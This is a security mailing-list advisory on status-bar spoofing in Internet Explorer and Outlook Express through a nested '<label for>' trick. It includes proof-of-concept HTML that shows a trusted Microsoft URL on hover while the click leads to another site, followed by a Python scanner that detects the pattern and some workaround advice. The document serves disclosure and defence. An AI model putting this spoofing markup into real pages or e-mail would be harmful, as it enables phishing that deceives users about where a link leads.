Message-ID: <BAY16-F274238AB780F3610DF2A36B96D0@phx.gbl>
From: bitlance_3 at hotmail.com (winter bitlance)
Subject: IE/OE Restricted Zone Status Bar Spoofing
Hi LIST.
Script code can normally manipulate the information shown in the status bar in
the Internet zone. By default, Outlook Express 6 opens HTML e-mail messages in
the Restricted sites zone instead of the Internet zone. Outlook Express users may
therefore place particular trust in the status bar, because HTML messages are
viewed in the context of the "Restricted" zone, where scripting is disabled.
However, an error in Internet Explorer allows the status bar to be manipulated
without any script code. It can be exploited by embedding a specially crafted
form in a link.
http-equiv discovered this weakness in Internet Explorer; it can potentially be
exploited by malicious people to trick users into visiting a malicious web site,
which facilitates a "phishing" attack (CAN-2004-1104).
Another weakness, which uses a "label for id" trick, has now been discovered. It
is a variant of CAN-2004-1104: a <label for="..."> element is nested inside
visible links to a trusted site, so hovering over the text shows the trusted URL
in the status bar, but clicking the label activates the element whose id it
names, an anchor pointing at the attacker's URL. No script is involved.
Example (the list archive replaced every "<" with "[" in the markup; restored here):
-----8<----- -----8<----- -----8<----- -----8<-----
<!-- saved from url=(0007)http:// -->
<body style="color: WindowText; background-color: Window;">
<div>IE/OE Restricted Zone Status Bar Spoofing</div>
<div>Tested on Windows XP with SP2 installed.</div>
<!-- Empty anchor: the real navigation target, activated through the label below -->
<p><a id="SPOOF" href="http://www.example.com/?maliciouscontents"></a></p>
<div>
<!-- Visible anchors: their href is what the status bar shows on hover -->
<a href="http://www.microsoft.com/windows/default.mspx">
<table>
<caption>
<a href="http://www.microsoft.com/windows/default.mspx ">
<!-- Clicking the label activates the element with id="SPOOF", not the enclosing anchors -->
<label for="SPOOF">
<u style="cursor: pointer; color: blue">
http://www.microsoft.com/windows/default.mspx
</u>
</label>
</a>
</caption>
</table>
</a>
</div>
-----8<----- -----8<----- -----8<----- -----8<-----
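As an added example (not part of the original advisory), the following Python scanner looks for the pattern above in HTML mail: a <label for="X"> whose target X is an <a href> rather than a form control, reported together with the href of the nearest enclosing anchor (what the status bar would show on hover). The sample inputs are constructed from the advisory's own markup plus one benign form; the heuristic and its field names are this example's own.

```python
"""Heuristic scanner for the IE/OE "label for id" status-bar spoofing pattern.

Added example, not code from the original advisory. A <label for="X"> should
only target form controls; when X resolves to an <a href>, a click activates
that anchor while any enclosing anchor is what the status bar shows on hover.
"""
from html.parser import HTMLParser


class LabelForSpoofDetector(HTMLParser):
    """Collects anchor ids/hrefs and every <label for> with its enclosing anchor."""

    def __init__(self):
        super().__init__()
        self.open_anchors = []     # hrefs of <a> elements currently open (nesting order)
        self.anchors_by_id = {}    # id -> href for every <a id="...">
        self.labels = []           # (for_id, href shown on hover, or None if no enclosing <a>)

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "a":
            href = (attrs.get("href") or "").strip()
            if attrs.get("id"):
                self.anchors_by_id[attrs["id"]] = href
            # html.parser does not auto-close nested <a>, so nesting is preserved
            self.open_anchors.append(href)
        elif tag == "label" and attrs.get("for"):
            shown = self.open_anchors[-1] if self.open_anchors else None
            self.labels.append((attrs["for"], shown))

    def handle_endtag(self, tag):
        if tag == "a" and self.open_anchors:
            self.open_anchors.pop()


def find_label_spoofs(html):
    """Return one finding per <label for> that resolves to an anchor whose href
    differs from the link the user sees (or that has no visible link at all)."""
    parser = LabelForSpoofDetector()
    parser.feed(html)
    parser.close()
    findings = []
    for for_id, shown in parser.labels:
        actual = parser.anchors_by_id.get(for_id)
        if actual is None:
            continue  # target is not an anchor (or does not exist): not this trick
        if actual != shown:
            findings.append({"label_for": for_id, "shown": shown, "actual": actual})
    return findings


# Constructed input: the advisory's markup with the list's "[" escaping undone.
ADVISORY_SAMPLE = """<!-- saved from url=(0007)http:// -->
<body style="color: WindowText; background-color: Window;">
<p><a id="SPOOF" href="http://www.example.com/?maliciouscontents"></a></p>
<div>
<a href="http://www.microsoft.com/windows/default.mspx">
<table><caption>
<a href="http://www.microsoft.com/windows/default.mspx ">
<label for="SPOOF"><u style="cursor: pointer; color: blue">
http://www.microsoft.com/windows/default.mspx
</u></label>
</a>
</caption></table>
</a>
</div>
</body>"""

# Constructed benign input: a label used as intended, targeting a form control.
BENIGN_SAMPLE = '<form><label for="user">User name</label><input id="user" name="user"></form>'

if __name__ == "__main__":
    for f in find_label_spoofs(ADVISORY_SAMPLE):
        print("status bar shows %(shown)s but a click goes to %(actual)s "
              "(label for=%(label_for)s)" % f)
    print("benign sample findings:", find_label_spoofs(BENIGN_SAMPLE))
```

The scanner is deliberately a parser-level heuristic: it does not render the page, so it also flags a label whose target anchor has no visible link at all (shown is None), which is equally anomalous in mail content.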
Workaround (Windows XP Service Pack 2):
You can change the zone elevation setting for each security zone by changing the
following option from Enable to Disable or Prompt in the Custom Level security
dialog:
"Web sites in less privileged Web content zones can navigate into this zone"
http://www.microsoft.com/technet/prodtechnol/winxppro/maintain/mangxpsp2/mngieps.mspx
Solution:
Never follow links from untrusted sources.
Read e-mail messages in plain text format if you use Outlook Express 6 SP1 or a
later version, to protect yourself from the HTML e-mail attack vector.
REGARDS.
--
bitlance winter